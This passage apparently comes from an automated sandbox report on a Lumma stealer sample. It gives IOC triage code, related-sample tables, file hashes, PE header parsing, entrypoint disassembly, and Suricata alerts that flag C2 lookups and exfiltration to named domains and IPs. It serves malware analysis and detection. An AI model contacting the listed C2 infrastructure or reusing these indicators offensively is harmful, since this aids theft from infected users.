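            why = "legitimate service used as dead drop; alert on the fetched path, do not block the domain"
        elif row["asn"] in shared_asns:
            action = "block-domain"
            why = "attacker domain behind a shared CDN; the IP serves other tenants"
        else:
            action = "block-domain-and-ip"
            why = "no shared-infrastructure indicator; treat as dedicated"
        out.append({"ip": ip, "domain": dom, "action": action, "why": why,
                    "families": dict(families), "related_samples": len(samples)})
    return out


if __name__ == "__main__":
    for r in triage(CONTACTED, ASSOCIATED):
        print(f"{r['domain']:<20} {r['ip']:<16} {r['action']:<20} "
              f"samples={r['related_samples']} families={r['families']}")
        print("   ", r["why"])
```

The related-sample count is the pivot value a hunter cares about: lev-tolstoi.com and its Cloudflare address together link to five distinct samples, all LummaC except one phishing URL, which justifies a domain block plus retro-hunting for those sample names; steamcommunity.com links to nine, but they span several stealer families, which is exactly what a shared dead-drop service looks like and why the indicator there is the profile path, not the host.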
Match            Associated Sample Name / URL                                                                          Detection  Threat Name                                           Context
AKAMAI-ASN1EU    99awhy8l.exe                                                                                          malicious  LummaC                                                23.55.153.106
                 5_6253708004881862888.exe                                                                             malicious  LummaC                                                23.55.153.106
                 noll.exe                                                                                              malicious  Stealc, Vidar                                         23.55.153.106
                 1fxm3u0d.exe                                                                                          malicious  LummaC                                                23.55.153.106
                 2kudv4ea.exe                                                                                          malicious  LummaC                                                23.55.153.106
                 EXTERNALRe.msg                                                                                        malicious  Unknown                                               23.44.201.32
                 ardware-v1.exe                                                                                        malicious  LummaC                                                23.55.153.106
                 YF3YnL4ksc.exe                                                                                        malicious  Unknown                                               23.218.93.195
                 ardware-v1.exe                                                                                        malicious  LummaC                                                23.55.153.106
                 mipsel.nn.elf                                                                                         malicious  Mirai, Okiru                                          23.43.121.120
CLOUDFLARENETUS  random.exe_Y.exe                                                                                      malicious  Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Xmrig  104.21.64.80
                 https://pluginvest.freshdesk.com/en/support/solutions/articles/157000010678-pluginvest-laadoplossing  malicious  Unknown                                               172.66.0.145
                 https://www.ispringsolutions.com/ispring-suite                                                        malicious  Unknown
                                                                                                                                                                                                                                      • 104.21.80.1
                                                                                                                                                                                                                                      5_6253708004881862888.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                      1fxm3u0d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                      2kudv4ea.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                      http://trackmail.info/QLTRG66TP4/offer/00248/811/iuk7x/b4q/41/32Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.21.52.161
                                                                                                                                                                                                                                      Memo - Impairment Test 2023 MEX010B (5).jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.21.10.224
                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                      • 104.21.23.76
                                                                                                                                                                                                                                      urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                                                                      • 172.67.191.110
Columns: Associated Sample Name / URL | Detection | Threat Name | Context
Match: a0e9f5d64349fb13191bc781f81f42e1
  99awhy8l.exe | malicious | LummaC | 172.67.157.254, 23.55.153.106
  random.exe_Y.exe | malicious | Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Xmrig | 172.67.157.254, 23.55.153.106
  5_6253708004881862888.exe | malicious | LummaC | 172.67.157.254, 23.55.153.106
  1fxm3u0d.exe | malicious | LummaC | 172.67.157.254, 23.55.153.106
  2kudv4ea.exe | malicious | LummaC | 172.67.157.254, 23.55.153.106
  file.exe | malicious | LummaC, Amadey, LummaC Stealer, RHADAMANTHYS, Xmrig | 172.67.157.254, 23.55.153.106
  NativeApp_G5L1NHZZ.exe | malicious | LummaC Stealer | 172.67.157.254, 23.55.153.106
  hzD92yQcTT.exe | malicious | LummaC | 172.67.157.254, 23.55.153.106
  JnEZtj3vtN.exe | malicious | PureCrypter | 172.67.157.254, 23.55.153.106
  ardware-v1.exe | malicious | LummaC | 172.67.157.254, 23.55.153.106
No context
No created / dropped files found
File type: PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit): 7.805439259889939
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: alexshlu.exe
File size: 828'416 bytes
MD5: 9821fa45714f3b4538cc017320f6f7e5
SHA1: 5bf0752889cefd64dab0317067d5e593ba32e507
SHA256: fd9343a395c034e519aea60471c518edbd8cf1b8a236ec924acf06348e6d3a72
SHA512: 90afec395115d932ea272b11daa3245769bdcc9421ecd418722830259a64df19ed7eacca38000f6a846db9f4363817f13232032ab30f2ab1aa7e88097361d898
SSDEEP: 12288:63+0sQQRz2L8CqyGAuDi5r5jBlhyyZzWDtkfDdEIHiyo+rBlhyyZzWDtkfDdEIHd:6BqSL8CWopBCyqXIdRBCyqXIdb
TLSH: 84050141B8C14472C46326328C74E7BA5B3EF9744F31AEDBE3A45A3DDA316C18735A4A
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Vg............................r.............@.................................s.....@..................................<..<..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x40e572
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows cui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
Time Stamp: 0x6756FE8D [Mon Dec 9 14:28:29 2024 UTC]
TLS Callbacks: none
CLR (.Net) Version: none
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 8f4e72561d4efc2a78f43ace5ca381df
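Every field above except the hashes is read straight out of the PE headers or computed over the raw bytes: Entrypoint is ImageBase plus AddressOfEntryPoint, Subsystem 3 is "windows cui", the two characteristics lists are bit flags, and Time Stamp is the COFF TimeDateStamp as a Unix time. The Python below is an added example, not Joe Sandbox code and not bytes from alexshlu.exe: it parses those fields from a constructed PE32 header populated with the values in this report (section count and sizes are made up) and computes the 8-bit Shannon entropy that the "Entropy (8bit)" line reports. An entropy of 7.8 against a ceiling of 8.0 is the usual sign of packed or encrypted content, so the value is worth checking per section rather than only for the whole file when you have the binary.

```python
"""Added example: recover the static-info fields of a PE32 from its headers
and compute 8-bit entropy. Not Joe Sandbox code; the header is constructed."""
import math
import struct
from datetime import datetime, timezone

# IMAGE_FILE_* and IMAGE_DLLCHARACTERISTICS_* bits from winnt.h (subset)
FILE_CHARACTERISTICS = {
    0x0002: "EXECUTABLE_IMAGE",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x2000: "DLL",
}
DLL_CHARACTERISTICS = {
    0x0040: "DYNAMIC_BASE",
    0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT",
    0x0200: "NO_ISOLATION",
    0x0400: "NO_SEH",
    0x0800: "NO_BIND",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}
SUBSYSTEMS = {1: "native", 2: "windows gui", 3: "windows cui"}


def decode_flags(value, table):
    """Names of the set bits, in ascending bit order (the order the report uses)."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe_headers(data):
    """Read the COFF header and PE32 optional header fields behind the report's
    Entrypoint, Imagebase, Subsystem, Time Stamp and characteristics lines."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, _, tstamp, _, _, _, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20                                   # COFF header is 20 bytes
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("not a PE32 optional header (magic != 0x10b)")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    os_major, os_minor, img_major, img_minor, sub_major, sub_minor = \
        struct.unpack_from("<HHHHHH", data, opt + 40)
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    return {
        "machine": machine,
        "timestamp_utc": datetime.fromtimestamp(tstamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "file_characteristics": decode_flags(chars, FILE_CHARACTERISTICS),
        "imagebase": image_base,
        "entrypoint": image_base + entry_rva,         # report shows a VA, header stores an RVA
        "os_version": (os_major, os_minor),
        "file_version": (img_major, img_minor),       # MajorImageVersion / MinorImageVersion
        "subsystem_version": (sub_major, sub_minor),
        "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
        "dll_characteristics": decode_flags(dll_chars, DLL_CHARACTERISTICS),
    }


def shannon_entropy(data):
    """8-bit Shannon entropy in bits per byte; 8.0 is the maximum."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def build_sample_header():
    """Constructed PE32 header carrying the values this report lists.
    Section count and sizes are arbitrary; these are not the sample's bytes."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                       # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x014C, 4, 0x6756FE8D, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                       # PE32 magic
    struct.pack_into("<I", opt, 16, 0xE572)                     # AddressOfEntryPoint (RVA)
    struct.pack_into("<I", opt, 28, 0x400000)                   # ImageBase
    struct.pack_into("<HHHHHH", opt, 40, 6, 0, 6, 0, 6, 0)      # OS / image / subsystem versions
    struct.pack_into("<HH", opt, 68, 3, 0x8340)                 # CUI; DYNAMIC_BASE|NX_COMPAT|NO_ISOLATION|TERMINAL_SERVER_AWARE
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    for key, value in parse_pe_headers(build_sample_header()).items():
        print(f"{key}: {value}")
    print("entropy, uniform bytes:", shannon_entropy(bytes(range(256)) * 4))
```

Point `parse_pe_headers` at the first few kilobytes of a real file to reproduce the report's static block; `shannon_entropy` over each section's raw data is the quick way to locate where the packed payload lives.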
Entrypoint preview (instructions at 0x40e572):

call 00007F07A0B718DAh
jmp 00007F07A0B71749h

mov ecx, dword ptr [00436900h]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007F07A0B718D6h
test esi, ecx
jne 00007F07A0B718F8h
call 00007F07A0B71901h
mov ecx, eax
cmp ecx, edi
jne 00007F07A0B718D9h
mov ecx, BB40E64Fh
jmp 00007F07A0B718E0h
test esi, ecx
jne 00007F07A0B718DCh
or eax, 00004711h
shl eax, 10h
or ecx, eax
mov dword ptr [00436900h], ecx
not ecx
pop edi
mov dword ptr [00436940h], ecx
pop esi
ret

push ebp
mov ebp, esp
sub esp, 14h
lea eax, dword ptr [ebp-0Ch]
xorps xmm0, xmm0
push eax
movlpd qword ptr [ebp-0Ch], xmm0
call dword ptr [00433F48h]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                      call dword ptr [00433F00h]
                                                                                                                                                                                                                                      xor dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                      call dword ptr [00433EFCh]
                                                                                                                                                                                                                                      xor dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                      lea eax, dword ptr [ebp-14h]
                                                                                                                                                                                                                                      push eax
                                                                                                                                                                                                                                      call dword ptr [00433F90h]
                                                                                                                                                                                                                                      mov eax, dword ptr [ebp-10h]
                                                                                                                                                                                                                                      lea ecx, dword ptr [ebp-04h]
                                                                                                                                                                                                                                      xor eax, dword ptr [ebp-14h]
                                                                                                                                                                                                                                      xor eax, dword ptr [ebp-04h]
                                                                                                                                                                                                                                      xor eax, ecx
                                                                                                                                                                                                                                      leave
                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                      mov eax, 00004000h
                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                      push 00438008h
                                                                                                                                                                                                                                      call dword ptr [00433F68h]
                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                      push 00030000h
                                                                                                                                                                                                                                      push 00010000h
                                                                                                                                                                                                                                      push 00000000h
                                                                                                                                                                                                                                      call 00007F07A0B790FEh
                                                                                                                                                                                                                                      add esp, 0Ch
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x33ce0 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3a000 | 0x10 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x3b000 | 0x1f88 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x2ff08 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2c288 | 0xc0 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x33e94 | 0x178 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x29ec0 | 0x2a000 | ac710cf82f0bf7022a4aaa856b12d73e | False | 0.5421084449404762 | data | 6.670829529851215 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2b000 | 0xa33c | 0xa400 | ee2f812185df99eb0802af6cb8092b28 | False | 0.42485232469512196 | data | 4.924236004008865 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x36000 | 0x27d4 | 0x1800 | 472cb0caa2519382f7c923808f8b67fa | False | 0.3839518229166667 | data | 4.8137648404324445 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.TLS | 0x39000 | 0x9 | 0x200 | 1f354d76203061bfdd5a53dae48d5435 | False | 0.033203125 | data | 0.020393135236084953 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x3a000 | 0x10 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x3b000 | 0x1f88 | 0x2000 | accec0655340d78d26259bfb9ab151b5 | False | 0.7593994140625 | data | 6.543821280470182 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.bss | 0x3d000 | 0x48e00 | 0x48e00 | 21f9bc49b7a36b4c660dcde903a3c67d | False | 1.0003383629931388 | data | 7.999338839034315 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x86000 | 0x48e00 | 0x48e00 | 21f9bc49b7a36b4c660dcde903a3c67d | False | 1.0003383629931388 | data | 7.999338839034315 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
KERNEL32.dll | AcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, CreateThread, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WaitForSingleObjectEx, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
USER32.dll | CreateWindowExW, DefWindowProcW, GetMessageW, PostQuitMessage, RegisterClassW
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-18T12:08:01.982894+0100 | 2057945 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) | 1 | 192.168.2.8 | 56041 | 1.1.1.1 | 53 | UDP
2024-12-18T12:08:01.982894+0100 | 2057983 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) | 1 | 192.168.2.8 | 56041 | 1.1.1.1 | 53 | UDP
2024-12-18T12:08:02.221141+0100 | 2057949 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) | 1 | 192.168.2.8 | 65295 | 1.1.1.1 | 53 | UDP
2024-12-18T12:08:02.221141+0100 | 2057981 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) | 1 | 192.168.2.8 | 65295 | 1.1.1.1 | 53 | UDP
2024-12-18T12:08:02.451321+0100 | 2057929 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) | 1 | 192.168.2.8 | 63332 | 1.1.1.1 | 53 | UDP
2024-12-18T12:08:02.451321+0100 | 2057979 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) | 1 | 192.168.2.8 | 63332 | 1.1.1.1 | 53 | UDP
2024-12-18T12:08:02.688843+0100 | 2057931 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) | 1 | 192.168.2.8 | 49948 | 1.1.1.1 | 53 | UDP
2024-12-18T12:08:02.688843+0100 | 2057977 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) | 1 | 192.168.2.8 | 49948 | 1.1.1.1 | 53 | UDP
2024-12-18T12:08:02.913400+0100 | 2057925 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) | 1 | 192.168.2.8 | 58758 | 1.1.1.1 | 53 | UDP
2024-12-18T12:08:02.913400+0100 | 2057973 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) | 1 | 192.168.2.8 | 58758 | 1.1.1.1 | 53 | UDP
2024-12-18T12:08:03.147869+0100 | 2057927 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz) | 1 | 192.168.2.8 | 51738 | 1.1.1.1 | 53 | UDP
2024-12-18T12:08:03.147869+0100 | 2057975 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz) | 1 | 192.168.2.8 | 51738 | 1.1.1.1 | 53 | UDP
2024-12-18T12:08:03.390183+0100 | 2057943 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz) | 1 | 192.168.2.8 | 60764 | 1.1.1.1 | 53 | UDP
2024-12-18T12:08:03.390183+0100 | 2057971 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz) | 1 | 192.168.2.8 | 60764 | 1.1.1.1 | 53 | UDP
2024-12-18T12:08:03.701372+0100 | 2057935 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz) | 1 | 192.168.2.8 | 63719 | 1.1.1.1 | 53 | UDP
2024-12-18T12:08:03.701372+0100 | 2057969 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz) | 1 | 192.168.2.8 | 63719 | 1.1.1.1 | 53 | UDP
2024-12-18T12:08:05.461549+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49706 | 23.55.153.106 | 443 | TCP
2024-12-18T12:08:06.238765+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.8 | 49706 | 23.55.153.106 | 443 | TCP
2024-12-18T12:08:08.583198+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49707 | 172.67.157.254 | 443 | TCP
2024-12-18T12:08:11.606157+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.8 | 49707 | 172.67.157.254 | 443 | TCP
2024-12-18T12:08:11.606157+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49707 | 172.67.157.254 | 443 | TCP
2024-12-18T12:08:12.934292+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49708 | 172.67.157.254 | 443 | TCP
2024-12-18T12:08:16.629559+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.8 | 49708 | 172.67.157.254 | 443 | TCP
2024-12-18T12:08:16.629559+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49708 | 172.67.157.254 | 443 | TCP
2024-12-18T12:08:18.263337+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49709 | 172.67.157.254 | 443 | TCP
2024-12-18T12:08:20.477697+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.8 | 49709 | 172.67.157.254 | 443 | TCP
2024-12-18T12:08:21.853001+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49712 | 172.67.157.254 | 443 | TCP
2024-12-18T12:08:26.165876+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49713 | 172.67.157.254 | 443 | TCP
2024-12-18T12:08:32.213117+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49714 | 172.67.157.254 | 443 | TCP
2024-12-18T12:08:34.746544+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49715 | 172.67.157.254 | 443 | TCP
2024-12-18T12:08:34.751527+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.8 | 49715 | 172.67.157.254 | 443 | TCP
2024-12-18T12:08:40.694942+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49716 | 172.67.157.254 | 443 | TCP
2024-12-18T12:08:41.408657+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49716 | 172.67.157.254 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 12:08:04.065743923 CET | 49706 | 443 | 192.168.2.8 | 23.55.153.106
Dec 18, 2024 12:08:04.065798998 CET | 443 | 49706 | 23.55.153.106 | 192.168.2.8
Dec 18, 2024 12:08:04.065869093 CET | 49706 | 443 | 192.168.2.8 | 23.55.153.106
Dec 18, 2024 12:08:04.069221020 CET | 49706 | 443 | 192.168.2.8 | 23.55.153.106
Dec 18, 2024 12:08:04.069237947 CET | 443 | 49706 | 23.55.153.106 | 192.168.2.8
Dec 18, 2024 12:08:05.461487055 CET | 443 | 49706 | 23.55.153.106 | 192.168.2.8
Dec 18, 2024 12:08:05.461549044 CET | 49706 | 443 | 192.168.2.8 | 23.55.153.106
Dec 18, 2024 12:08:05.463787079 CET | 49706 | 443 | 192.168.2.8 | 23.55.153.106
Dec 18, 2024 12:08:05.463797092 CET | 443 | 49706 | 23.55.153.106 | 192.168.2.8
Dec 18, 2024 12:08:05.464096069 CET | 443 | 49706 | 23.55.153.106 | 192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:05.512118101 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:05.525614977 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:05.571332932 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.238818884 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.238850117 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.238874912 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.238884926 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.238909006 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.238909006 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.238948107 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.238965034 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.238965034 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.238991976 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.410190105 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.410232067 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.410408020 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.410434961 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.410475016 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.442702055 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.442740917 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.442785025 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.442795038 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.444782972 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.515985966 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.516019106 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.516062021 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.516067982 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:07.368242979 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:07.368309021 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:07.368395090 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:07.369697094 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:07.369713068 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:08.583112955 CET44349707172.67.157.254192.168.2.8
